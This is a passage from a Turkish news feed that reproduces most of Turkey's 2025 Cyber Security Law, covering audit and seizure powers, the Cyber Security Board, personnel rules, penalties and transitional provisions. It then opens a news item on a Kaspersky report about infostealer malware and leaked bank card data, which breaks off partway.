<p class="Metin"><span>(4) Denetimle görevlendirilenler; yürüttükleri denetim faaliyetleriyle sınırlı olarak elektronik ortamdaki verinin, belgelerin, elektronik altyapının, cihaz, sistem, yazılım ve donanımlarının incelenmesi, bunlardan kopya, dijital suret veya örnek alınması, konuyla ilgili yazılı veya sözlü açıklama istenmesi, gerekli tutanakların düzenlenmesi, tesislerin ve işletiminin incelenmesi konularında yetkilidir. Denetime tabi tutulanlar, ilgili cihaz, sistem, yazılım ve donanımları verilen sürelerde denetlemeye açık tutmak, denetim için gerekli altyapıyı temin etmek ve çalışır vaziyette tutmak için gerekli önlemleri almak zorundadır.<o:p></o:p></span></p>
<p class="Metin"><span>(5) Millî güvenlik, kamu düzeni, suç işlenmesinin veya siber saldırıların önlenmesi amacıyla hâkim kararı üzerine veya gecikmesinde sakınca bulunan hâllerde Cumhuriyet savcısının yazılı emri ile konutta, işyerinde ve kamuya açık olmayan kapalı alanlarda arama yapılabilir, uzun süreli hizmet aksamasına yol açmayacak ve kesintisiz şekilde kopya çıkarma ve el koyma işlemi gerçekleştirilebilir. </span><span>Çıkarılan kopyanın bir nüshası ilgilisine teslim edilir ve bu husus tutanağa geçirilerek imza altına alınır. Bu işlemlerin yapılabilmesi için makul sebeplerin oluştuğunun gerekçeleriyle birlikte gösterilmesi gerekir. Hâkim kararı olmaksızın yapılan arama ve gerçekleştirilen kopya çıkarma ve el koyma işlemleri <span class="SpellE">yirmidört</span> saat içinde görevli hâkimin onayına sunulur. Hâkim, kararını <span class="SpellE">kırksekiz</span> saat içinde açıklar; aksi hâlde çıkarılan kopyalar ve çözümü yapılan metinler derhâl imha edilir ve el koyma kendiliğinden kalkar. Yetkilendirilmiş veri merkezi işletmecilerinin veri merkezlerinde sadece hâkim kararıyla arama, kopya çıkarma ve el koyma işlemi yapılabilir. Bu fıkra kapsamına giren talepler bakımından Ankara sulh ceza hâkimliği yetkili ve görevlidir. Ancak kamu kurum ve kuruluşları bakımından hâkim kararı aranmaz.<o:p></o:p></span></p>
<p class="Metin"><b><span>Siber Güvenlik Kurulu<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 9- </span></b><span>(1) Siber Güvenlik Kurulu; Cumhurbaşkanı, Cumhurbaşkanı Yardımcısı, Adalet Bakanı, Dışişleri Bakanı, İçişleri Bakanı, Milli Savunma Bakanı, Sanayi ve Teknoloji Bakanı, Ulaştırma ve Altyapı Bakanı, Milli Güvenlik Kurulu Genel Sekreteri, Milli İstihbarat Teşkilatı Başkanı, Savunma <span class="SpellE">Sanayii</span> Başkanı ve Siber Güvenlik Başkanından oluşur. Cumhurbaşkanının katılmadığı hallerde Kurula Cumhurbaşkanı Yardımcısı başkanlık eder.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Kurul toplantılarına üyeler dışında, gündemin özelliğine göre ilgili bakan ve kişiler de çağrılarak bilgi ve görüş alınabilir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Kurul, görevleri kapsamında gerekli görmesi halinde komisyon ve çalışma grupları oluşturabilir. Komisyon ve çalışma grupları, Kurulun görev alanına giren hususlarda teknik düzeyde çalışmalar yapar ve karar önerileri oluşturur. Komisyon ve çalışma grubu toplantılarına görüşlerinden faydalanmak üzere alanında uzman kişiler davet edilebilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Kurulun görevleri şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) Siber güvenlikle ilgili politika, strateji, eylem planı ve diğer düzenleyici işlemlere yönelik kararları almak, alınan kararların tamamından veya bir kısmından istisna tutulacak kurum ve kuruluşları belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>b) Başkanlık tarafından hazırlanan siber güvenlik alanına ilişkin teknoloji yol haritasının ülke çapında uygulanmasına yönelik kararlar almak.<o:p></o:p></span></p>
<p class="Metin"><span>c) Siber güvenlik alanında teşvik verilecek öncelikli alanları belirlemek, siber güvenlik alanındaki insan kaynağının geliştirilmesine yönelik karar almak.<o:p></o:p></span></p>
<p class="Metin"><span>ç) Kritik altyapı sektörlerini belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>d) Başkanlık ile kamu kurum ve kuruluşları arasında meydana gelebilecek ihtilaflar hakkında karar almak.<o:p></o:p></span></p>
<p class="Metin"><span>(5) Kurulun sekretarya hizmetleri Başkanlık tarafından yürütülür. Kurul, komisyon ve çalışma gruplarının çalışma usul ve esasları Cumhurbaşkanı tarafından çıkarılacak yönetmelikle belirlenir.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>ÜÇÜNCÜ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Personele İlişkin Hükümler<o:p></o:p></span></p>
<p class="Metin"><b><span>Sözleşmeli uzman personel istihdamı<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 10- </span></b><span>(1) Başkanlıkta siber güvenliğin sağlanması ile ilgili görevleri yürütmek üzere sayısı Cumhurbaşkanınca belirlenecek sözleşmeli uzman personel çalıştırılabilir. Bu personelin nitelikleri, atanma şartları gibi istihdamlarına ilişkin hususlar ile bunlara verilecek her türlü ödemeler <span class="GramE">dahil</span> net ücretler, 14/7/1965 tarihli ve 657 sayılı Devlet Memurları Kanununun 4 üncü maddesinin (B) bendine göre çalıştırılanlar için uygulanmakta olan sözleşme ücret tavanının beş katını aşmamak üzere Siber Güvenlik Kurulu tarafından ilgililerin yürüteceği görevler göz önüne alınarak tespit edilir. Bu fıkra kapsamındaki personel, <span class="GramE">31/5/2006</span> tarihli ve 5510 sayılı Sosyal Sigortalar ve Genel Sağlık Sigortası Kanununun 4 üncü maddesinin birinci fıkrasının (a) bendi kapsamında sigortalı sayılır. Kanunlardaki özel hükümler saklı kalmak kaydıyla, bu statüde çalıştırılma, sözleşme bitiminde kamu kurum ve kuruluşlarında herhangi bir pozisyon, kadro veya statüde çalışma açısından kazanılmış hak teşkil etmez.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlıkta; geçici olarak görevlendirilenler de <span class="GramE">dahil</span> olmak üzere, görev alan tüm personele 7/4/2021 tarihli ve 7315 sayılı Güvenlik Soruşturması ve Arşiv Araştırması Kanunu uyarınca güvenlik soruşturması ve arşiv araştırması birlikte yapılır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Zorunlu hizmet yükümlülüklerinin devri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 11- </span></b><span>(1) Başkanlıkta istihdam edilen personelden ilgili mevzuatı kapsamında diğer kamu kurum ve kuruluşlarına karşı zorunlu hizmet yükümlülüğü bulunanların Başkanlıkta geçen hizmet süreleri, ilgili kamu kurum ve kuruluşunun da muvafakati alınmak kaydıyla, söz konusu yükümlülük sürelerinden düşülür.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yasak hükümler<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 12- </span></b><span>(1) Başkanlıkta kadrolu veya sözleşmeli statüde görev yapanlardan Başkanlık ile herhangi bir nedenle ilişiği kesilenler Başkanlıktan muvafakat almadan iki yıl süreyle yurt içi veya yurt dışında siber güvenlik alanında resmi veya özel başka hiçbir görev alamaz ve bu alanda ticaretle uğraşamaz, serbest meslek faaliyetinde bulunamaz ve özellikle bu sektörde faaliyet gösteren bir şirkette hissedar veya yönetici olamaz.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlıktaki görev ve faaliyetler kapsamında edinilen bilgi, belge ve benzeri her türlü verinin, Başkanlıkça yetki verilen durumlar hariç olmak üzere, radyo, televizyon, internet, sosyal medya, gazete, dergi, kitap ve diğer tüm medya araçları ile her türlü yazılı, görsel, işitsel ve elektronik kitle iletişim araçları vasıtasıyla yayımlanması veya açıklanması yasaktır.</span><span><o:p></o:p></span></p>
<p class="Metin"><b><span>Sır saklama yükümlülüğü<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 13- </span></b><span>(1) Başkanlık tarafından yürütülen görev ve faaliyetler kapsamında edinilen kamuya, ilgililere ve üçüncü kişilere ait gizlilik taşıyan bilgiler, kişisel veriler, ticari sırlar ve bunlara ait belgeler mevzuat gereği yetkili kılınan mercilerden başkasına açıklanamaz, gerçek ve tüzel kişilerin menfaatine kullanılamaz.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>DÖRDÜNCÜ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Gelir ve Muafiyetler<o:p></o:p></span></p>
<p class="Metin"><b><span>Başkanlığın gelirleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 14- </span></b><span>(1) Başkanlığın gelirleri;<o:p></o:p></span></p>
<p class="Metin"><span>a) Genel bütçeden yapılacak Hazine yardımlarından,<o:p></o:p></span></p>
<p class="Metin"><span>b) Başkanlığın faaliyetlerinden elde edilen gelirlerden,<o:p></o:p></span></p>
<p class="Metin"><span>c) Başkanlık tarafından verilen idari para cezalarından elde edilen gelirlerden,<o:p></o:p></span></p>
<p class="Metin"><span>ç) Kanun ve kararnamelerle kurulu bulunan ve kurulacak olan fonların gelirlerinden Cumhurbaşkanı kararıyla yüzde 10’una kadar aktarılacak tutarlardan,<o:p></o:p></span></p>
<p class="Metin"><span>d) Diğer gelirlerden,<o:p></o:p></span></p>
<p class="Metin"><span>oluşur</span><span>.<o:p></o:p></span></p>
<p class="Metin"><b><span>Muafiyetler<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 15- </span></b><span>(1) Başkanlığın ihtiyaçları kapsamında yurt dışından ithalat veya hibe yoluyla sağlanacak her türlü malzeme, araç, gereç, makine, cihaz ve sistemleri ve bunların araştırma, geliştirme, eğitim, üretim, modernizasyon ve yazılımı ile yapım, bakım ve onarımlarında kullanılacak yedek parçalar, hammadde malzeme ile bedelsiz olarak dış kaynaklardan alınan yardım malzemeleri nedeniyle yapılacak işlemler gümrük vergisinden, fon ve resimlerden, harçlardan, bu işlemler nedeniyle düzenlenen kâğıtlar damga vergisinden istisnadır. </span></span><span>Bu istisna, Başkanlık adına yurt dışına onarım, modernizasyon, bakım, mahrece iade, değişim maksadıyla kati çıkış, geçici çıkış, bedelsiz ithalat ve giriş işlemlerinde de uygulanır.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlığın görevlerinin yürütülmesi sırasında ihtiyaç duyduğu her türlü malzeme, araç, gereç, makine, cihaz ve sistemlerin ithalatında ve yurt dışına çıkış aşamalarında, kamu kurum ve kuruluşlarından, gerçek ve tüzel kişilerden alınması gereken izin ve uygunluk belgesi aranmaz.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Kamu kurum ve kuruluşları ile diğer kurum ve kuruluşlar, bu Kanunda yazılı görevlerin yerine getirilmesi sırasında ihtiyaç duyulan hâllerde, kullanımlarında bulunan ve müsadere edilen her türlü malzeme, <span class="GramE">ekipman</span>, teçhizat ve cihazı, diğer kanunların bu konudaki düzenlemelerine bakılmaksızın Başkanlığa geçici olarak tahsis edebilir veya bedelsiz devredebilirler.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>BEŞİNCİ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Cezai Hükümler ve İdari Para Cezalarının Uygulanması<o:p></o:p></span></p>
<p class="Metin"><b><span>Cezai hükümler ve idari para cezaları<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 16- </span></b><span>(1) Kamu kurum ve kuruluşları hariç olmak üzere bu Kanunla yetkilendirilen mercilerin ve denetim görevlilerinin görev ve yetkileri kapsamında istedikleri bilgi, belge, yazılım, veri ve donanımı vermeyenler veya bunların alınmasına engel olanlar bir yıldan üç yıla kadar hapis ve <span class="SpellE">beşyüz</span> günden <span class="SpellE">binbeşyüz</span> güne kadar adli para cezası ile cezalandırılır.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>(2) Bu Kanun uyarınca alınması gerekli onay, yetki veya izinleri almaksızın faaliyet yürütenler iki yıldan dört yıla kadar hapis ve bin günden <span class="SpellE">ikibin</span> güne kadar adli para cezası ile cezalandırılır.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Sır saklama yükümlülüğünü yerine getirmeyenlere dört yıldan sekiz yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Siber uzayda veri sızıntısı nedeniyle daha önce yer alan kişisel veya kritik kamu hizmeti kapsamına giren kurumsal verileri, kişilerin veya kurumların izni olmaksızın ücretli veya ücretsiz şekilde erişime açan, paylaşan veya satışa çıkaranlara üç yıldan beş yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(5) Siber uzayda veri sızıntısı olmadığını bildiği halde halk arasında endişe, korku ve panik yaratmak ya da kurumları veya şahısları hedef göstermek amacıyla siber güvenlikle ilgili veri sızıntısı olduğuna yönelik gerçeğe aykırı içerik oluşturanlara veya bu maksatla bu içerikleri yayanlara iki yıldan beş yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span> (6) Türkiye Cumhuriyeti’nin siber uzaydaki milli gücünü meydana getiren unsurlarına yönelik olarak siber saldırıda bulunan veya bu saldırı neticesinde elde ettiği her türlü veriyi siber uzayda bulunduranlara fiil daha ağır bir cezayı gerektiren başka bir suç oluşturmadığı takdirde sekiz yıldan <span class="SpellE">oniki</span> yıla kadar hapis cezası verilir. Bu saldırı neticesinde elde ettiği her türlü veriyi siber uzayda yayan, başka bir yere gönderen veya satışa çıkaranlara on yıldan <span class="SpellE">onbeş</span> yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(7) Yukarıdaki fıkralara göre verilecek ceza suçun kamu görevlisi tarafından işlenmesi halinde üçte bir oranında, birden fazla kişi tarafından işlenmesi halinde yarı oranında ve bir örgütün faaliyeti çerçevesinde işlenmesi halinde yarısından iki katına kadar artırılır.<o:p></o:p></span></p>
<p class="Metin"><span>(8) 12 <span class="SpellE">nci</span> maddeye aykırı davrananlara üç yıldan beş yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(9) Bu Kanundan kaynaklanan görev ve yetkilerini kötüye kullananlara veya kritik altyapıların siber saldırılara karşı korunması kapsamında görevinin gereklerine aykırı hareket etmek suretiyle veri ihlali yaşanmasına sebebiyet verenlere bir yıldan üç yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(10) 7 <span class="SpellE">nci</span> maddenin birinci fıkrasının (b) ve (c) bentlerindeki görev ve sorumluluklarını yerine getirmeyenlere bir milyon Türk lirasından on milyon Türk lirasına kadar, 18 inci maddedeki görev ve sorumluluklarını yerine getirmeyenlere ise on milyon Türk lirasından yüz milyon Türk lirasına kadar idari para cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(11) 8 inci maddenin dördüncü fıkrasındaki yükümlülüklerini yerine getirmeyenlere, <span class="SpellE">yüzbin</span> Türk lirasından bir milyon Türk lirasına kadar, bu yükümlülüklerin ticari şirketlerce yerine getirilmemesi halinde <span class="SpellE">yüzbin</span> Türk lirasından az olmamak üzere bağımsız denetimden geçmiş yıllık finansal tablolarında yer alan brüt satış <span class="GramE">hasılatının</span> yüzde 5’ine kadar idari para cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><b><span>İdari para cezalarının uygulanması<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 17- </span></b><span>(1) İdari para cezalarının uygulanmasından önce ilgilinin savunması alınır. Savunma istendiğine ilişkin yazının tebliğ tarihinden itibaren otuz gün içinde savunma verilmemesi halinde, ilgilinin savunma hakkından feragat ettiği kabul edilir.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Bu Kanunda tanımlanan kabahatlerden birinin idari yaptırım kararı verilinceye kadar birden çok işlendiğinin tespit edilmesi halinde ilgili gerçek veya tüzel kişiye tek idari para cezası verilir ve verilecek ceza iki katını aşmayacak şekilde artırılarak uygulanır. Kabahatin işlenmesi nedeniyle bir menfaat temin edilmesi veya zarara sebebiyet verilmesi halinde verilecek idari para cezasının miktarı bu menfaat veya zararın üç katından az beş katından fazla olamaz.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Başkanlık tarafından verilen idari para cezaları, tebliğ tarihinden itibaren bir ay içinde ödenir. Bu süre içinde ödenmeyen ve kesinleşen idari para cezaları, Kurumun bildirimi üzerine <span class="GramE">21/7/1953</span> tarihli ve 6183 sayılı Amme Alacaklarının Tahsil Usulü Hakkında Kanun hükümlerine göre vergi dairelerince tahsil edilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Tahsil edilen idari para cezalarının yüzde ellisi Başkanlık bütçesine, yüzde ellisi genel bütçeye gelir kaydedilir. Başkanlığın tahsil ettiği idari para cezalarından ayrılan genel bütçe payı; vergi dairesince tahsil edilen idari para cezalarından ayrılan Başkanlık payı, <span class="GramE">tahsilatı</span> takip eden ay sonuna kadar aktarılır.<o:p></o:p></span></p>
<p class="Metin"><span>(5) Bu Kanun uyarınca verilen idari para cezası kararlarına karşı idari yargı yoluna başvurulabilir.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>ALTINCI BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Çeşitli ve Son Hükümler<o:p></o:p></span></p>
<p class="Metin"><b><span>Siber güvenlik ürünleri ve şirketleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 18- </span></b><span>(1) Siber güvenlik ürün, sistem, yazılım, donanım ve hizmetlerin yurt dışına satışı, Başkanlıkça belirlenecek usul ve esaslara uygun olarak yapılır. Bu usul ve esaslarda yer alacak izne tabi ürünlerin yurt dışına satışında Başkanlık onayı alınır.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Siber güvenlik ürün, sistem, yazılım, donanım ve hizmetleri üreten şirketlerin birleşme, bölünme, pay devri veya satış işlemleri Başkanlığa bildirilir. Bu işlemler kapsamında gerçek veya tüzel kişilere münferiden veya birlikte şirket üzerinde doğrudan veya dolaylı kontrol hakkı veya karar alma yetkisi sağlayan işlemler Başkanlık onayına tabidir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Başkanlık onayı alınmaksızın gerçekleştirilen işlemler hukuki bir geçerlilik kazanmaz. Başkanlık, bu madde kapsamında yapılacak işlemlerle ilgili olarak kurum ve kuruluşlardan bilgi ve belge talep edebilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Bu maddenin uygulanmasına ilişkin hususlar Başkanlık tarafından yayımlanacak usul ve esaslar ile belirlenir.<o:p></o:p></span></p>
<p class="Metin"><b><span>Değiştirilen ve yürürlükten kaldırılan hükümler<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 19- </span></b><span>(1) <span class="GramE">27/6/1989</span> tarihli ve 375 sayılı Kanun Hükmünde Kararnamenin ek 34 üncü maddesinin üçüncü fıkrasına aşağıdaki cümle eklenmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“Siber Güvenlik Başkanı, mali ve sosyal hak ve yardımlar ile emeklilik hakları bakımından, bu fıkrada belirtilen usul ve esaslar çerçevesinde bakanlık müsteşarına denk kabul edilir.”<o:p></o:p></span></p>
<p class="Metin"><span>(2) <span class="GramE">10/12/2003</span> tarihli ve 5018 sayılı Kamu Malî Yönetimi ve Kontrol Kanununa ekli (II) sayılı Cetvelin “B) Özel Bütçeli Diğer İdareler” bölümüne aşağıdaki satır eklenmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“46) Siber Güvenlik Başkanlığı”<o:p></o:p></span></p>
<p class="Metin"><span>(3) <span class="GramE">4/5/2007</span> tarihli ve 5651 sayılı İnternet Ortamında Yapılan Yayınların Düzenlenmesi ve Bu Yayınlar Yoluyla İşlenen Suçlarla Mücadele Edilmesi Hakkında Kanunun 10 uncu maddesinin altıncı fıkrası aşağıdaki şekilde değiştirilmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“(6) Kurum, görevleri kapsamında, içerik, yer, erişim sağlayıcılar ve ilgili diğer kurum ve kuruluşlarla koordinasyon sağlar, gerekli tedbirlerin aldırılması konusunda faaliyet yürütür ve ihtiyaç duyulan çalışmaları yapar.”<o:p></o:p></span></p>
<p class="Metin"><span>(4) <span class="GramE">5/11/2008</span> tarihli ve 5809 sayılı Elektronik Haberleşme Kanununun;<o:p></o:p></span></p>
<p class="Metin"><span>a) 5 inci maddesinin birinci fıkrasının (h) bendi yürürlükten kaldırılmış ve (ı) bendi aşağıdaki şekilde değiştirilmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“ı) Bakanlığın yürüttüğü görevler kapsamındaki veri ve sistemlerin barındırılacağı veri merkezleri ve verilerin transferi için gerekli altyapıları kurmak, kurdurmak, işletmek, işlettirmek, bu merkezlere yönelik politika, strateji ve hedefleri belirlemek, eylem planlarını hazırlamak, eylem planlarını izlemek ve tüm bu faaliyetlere yönelik uygulama usul ve esaslarını belirlemek, kurulum, uygulama ve işletim süreçlerini planlamak, yürütmek ve koordine etmek.”</span><span><o:p></o:p></span></p>
<p class="Metin"><span>b) 6 <span class="SpellE">ncı</span> maddesinin birinci fıkrasının (v) bendi aşağıdaki şekilde değiştirilmiştir.<o:p></o:p></span></p>
<p class="Metin"><span>“v) İnternet alan adları ve Kurum görevleri konularında Cumhurbaşkanı ve Bakanlık tarafından verilen görevleri yerine getirmek.”<o:p></o:p></span></p>
<p class="Metin"><span>c) 60 <span class="SpellE">ıncı</span> maddesinin <span class="SpellE">onbirinci</span> fıkrası ile ek 1 inci ve ek 2 <span class="SpellE">nci</span> maddeleri yürürlükten kaldırılmıştır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Uyum, geçiş düzenlemeleri ve kuruluş işlemleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>GEÇİCİ MADDE 1- </span></b><span>(1) Bilgi Teknolojileri ve İletişim Kurumu Başkanlığına ve Dijital Dönüşüm Ofisine ait ve münhasıran ulusal siber güvenlik faaliyetleri kapsamında kullanılan her türlü taşınır, bilgi işlem altyapısı ve sistemler, taşıt, araç, gereç ve malzeme, fiziki ve elektronik ortamdaki her türlü kayıt ve doküman ile diğer her türlü varlık <span class="GramE">envanteri</span> ile mezkûr Başkanlık ve Ofis tarafından söz konusu faaliyetlerin yürütülmesinden doğan her türlü borç ve alacaklar, hak ve yükümlülükler, Siber Güvenlik Başkanlığına bu Kanunun yayımından itibaren altı ay içerisinde devredilir.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Bilgi Teknolojileri ve İletişim Kurumu Başkanlığının ve Dijital Dönüşüm Ofisinin kadro ve pozisyonlarında bulunan personelden ulusal siber güvenlik faaliyetleri kapsamında çalışanlar, taleplerinin bulunması ve Siber Güvenlik Başkanlığınca uygun görülmesi halinde Başkanlıkta görevlendirilebilirler. Bunlardan talepte bulunan ve Başkanlıkça uygun görülenler mevcut kadro veya pozisyon unvanları ve öğrenim durumları dikkate alınarak bu Kanunun yayımından itibaren dokuz ay içerisinde Başkanlıkta durumlarına uygun kadro veya pozisyonlara atanabilirler. Bu fıkra kapsamında ataması yapılan personelin önceki kurumlarında veya kadrolarında geçirdikleri süreler yeni kurumlarında veya kadrolarında geçirilmiş sayılır. Bu fıkra kapsamında ataması yapılan personelden mali hakları hususunda haklarında 375 sayılı Kanun Hükmünde Kararnamenin geçici 10 uncu maddesi veya ilgili diğer mevzuat hükümleri uygulananlar hakkında anılan düzenlemelerin uygulanmasına devam edilir. Dijital Dönüşüm Ofisinden bu fıkra kapsamında ataması yapılan personele, iş mevzuatına göre herhangi bir tazminat ve yıllık izin ücreti ödenmez. Bu personelin önceden kıdem tazminatı ödenmiş süreleri hariç kıdem tazminatına hak kazanacak şekilde geçmiş olan hizmet süreleri, ilgisine göre emekli ikramiyelerinin veya iş sonu tazminatının hesabında dikkate alınır. Ayrıca, bu personele bu fıkraya göre atanmadan önce ilave tediye veya ikramiye ödenmiş olması halinde ödenen tutarların atamanın yapıldığı tarihten sonraki çalışılmayan günlere tekabül eden kısmı geri alınır.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Bilgi Teknolojileri ve İletişim Kurumu Başkanlığının ve Dijital Dönüşüm Ofisinin ulusal siber güvenlik faaliyetleri ile ilgili yapılmış olan sözleşmeler, açılmış ve açılacak olan davalar ve icra işlemlerinde ikinci fıkradaki atama işlemlerinin tamamlanması tarihi itibarıyla Başkanlık taraf sıfatını kazanır, mevcut dava dosyaları ve icra takiplerine ilişkin dosyalar Başkanlığa devredilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Siber güvenlik alanında faaliyet icra eden dernek, derneklerden oluşan federasyonlar, vakıflar ile ticaret şirketleri, altıncı fıkrada belirtilen düzenlemelerin yürürlüğe girmesinden itibaren bir yıl içerisinde Başkanlığın belirlediği ilke ve esaslar çerçevesinde sertifikasyon, yetkilendirme ve belgelendirme işlemlerini tamamlamakla yükümlüdürler. Bu yükümlülüğün yerine getirilmemesi halinde siber güvenlik alanında faaliyette bulunulamaz. Bu süre sonunda söz konusu yükümlülüklerini yerine getirmeyen dernek, vakıf ve federasyonların tüzel kişiliklerine, Başkanlığın talebi üzerine <span class="GramE">22/11/2001</span> tarihli ve 4721 sayılı Türk Medenî Kanununun ilgili hükümlerine göre mahkeme kararıyla son verilir ve mahkeme tarafından yargılama sürecinde gerekli tedbirler alınır. Ticaret şirketleri ise aynı süre içinde yükümlülüklerini yerine getirmediği takdirde ticaret unvanlarında ve faaliyet konularında yer alan siber güvenliğe ilişkin ibareleri şirket sözleşmelerinden çıkarır veya ticaret sicilinden terkin edilmeleri amacıyla tasfiye süreçlerini başlatır.<o:p></o:p></span></p>
<p class="Metin"><span>(5) 19 uncu maddenin üçüncü ve dördüncü fıkraları uyarınca yürürlükten kaldırılan hükümler kapsamında faaliyet gösteren kurumlar Başkanlığın teşkilatlanmasının tamamlanmasına kadar anılan hükümler çerçevesinde görevlerini yürütmeye devam ederler.<o:p></o:p></span></p>
<p class="Metin"><span>(6) Bu Kanunun uygulanmasına ilişkin düzenlemeler, bir yıl içinde yürürlüğe konulur. Bu düzenlemeler yürürlüğe girinceye kadar mevcut düzenlemelerin bu Kanuna aykırı olmayan hükümlerinin uygulanmasına devam olunur.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yürürlük<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 20- </span></b><span>(1) Bu Kanun yayımı tarihinde yürürlüğe girer.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yürütme<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 21- </span></b><span>(1) Bu Kanun hükümlerini Cumhurbaşkanı yürütür.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>18/3/2025</span></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>
<p><iframe width="1280" height="720" src="https://www.youtube.com/embed/7yzo9f76x_4" title="Türkiye'nin İlk Siber Güvenlik Kanunu Yürürlüğe Girdi" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen="allowfullscreen"></iframe></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Tehdidi: 24 Milyon Cihazdan Banka Bilgileri Sızdırıldı!</title>
            <link>https://cumha.com.tr/siber-guvenlik-tehdidi-24-milyon-cihazdan-banka-bilgileri-sizdirildi</link>
            <guid>https://cumha.com.tr/siber-guvenlik-tehdidi-24-milyon-cihazdan-banka-bilgileri-sizdirildi</guid>
            <description><![CDATA[ Kaspersky&#039;nin son raporuna göre, 2023-2024 yılları arasında 26 milyon cihaz, &quot;infostealer&quot; adı verilen kötü amaçlı yazılımlarla enfekte oldu. Bu yazılımlar, banka kartı bilgilerini çalarak milyonlarca kullanıcıyı mağdur etti. Dark web&#039;de 2,3 milyon banka kartı bilgisi sızdırıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67d42b4b29fc6.webp" length="82050" type="image/webp"/>
            
            <pubDate>Fri, 14 Mar 2025 16:12:48 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Banka kartı bilgilerinin karanlık web&#039;e nasıl sızdırıldığı, infostealer yazılımları nasıl çalışıyor, kötü amaçlı yazılımlardan nasıl korunabiliriz, kullanıcıların kimlik bilgileri nasıl çalınıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="395" data-end="398">Siber güvenlik dünyasında kaygı verici gelişmeler yaşanıyor. Kaspersky tarafından yayımlanan son rapora göre, 2023 ve 2024 yıllarında 26 milyon cihaz, "infostealer" olarak bilinen kötü amaçlı yazılımlarla enfekte oldu. Bu yazılımlar, kullanıcıların banka kartı numaralarını, şifrelerini ve diğer hassas verilerini çalarak milyonlarca kişinin mağdur olmasına neden oldu.</p>
<p></p>
<p data-start="769" data-end="1229"><strong data-start="769" data-end="817">Dark Web'de Banka Kartı Bilgileri Sızdırıldı</strong><br data-start="817" data-end="820">Kaspersky'nin tahminlerine göre, son dönemde Dark Web'e 2,3 milyon banka kartı bilgisi sızdırıldı. Raporda, her 14 infostealer enfeksiyonundan birinin saldırganların banka kartı verilerini çalmasıyla sonuçlandığı belirtiliyor. Küresel çapta verilen banka kartlarının sadece yüzde 1'i karanlık ağda sızdırılmış olsa da, sızdırılan kart numaralarının yüzde 95'inin "teknik olarak geçerli" olduğu ifade ediliyor.</p>
